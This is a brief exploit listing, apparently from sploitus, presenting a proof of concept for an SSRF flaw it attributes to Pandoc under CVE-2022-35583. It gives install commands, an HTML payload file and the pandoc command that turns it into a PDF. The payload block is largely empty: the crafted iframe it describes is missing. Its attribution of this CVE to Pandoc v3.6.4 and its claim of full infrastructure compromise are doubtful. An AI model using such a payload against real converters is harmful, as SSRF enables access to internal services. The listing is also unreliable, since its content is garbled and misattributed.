Share
## https://sploitus.com/exploit?id=C8A58F78-7F50-5595-B72D-258908393844
# CVE-2022-35583 Pandoc SSRF POC
A Server-Side Request Forgery (SSRF) in JGM Pandoc v3.6.4 allows attackers to gain access to and compromise the whole infrastructure via injecting a crafted iframe.

# Install Pandoc
```
# MacOS
brew install pandoc
# Ubuntu/Debain
apt install pandoc
# CentOS
yum install pandoc
```

# payload
```html




    
    
    CVE-2022-35583 Proof Of Concept



    
        CVE-2022-35583 Proof Of Concept
    
    



```
# convert payload to pdf using pandoc
```
pandoc payload.html -o output1.pdf
```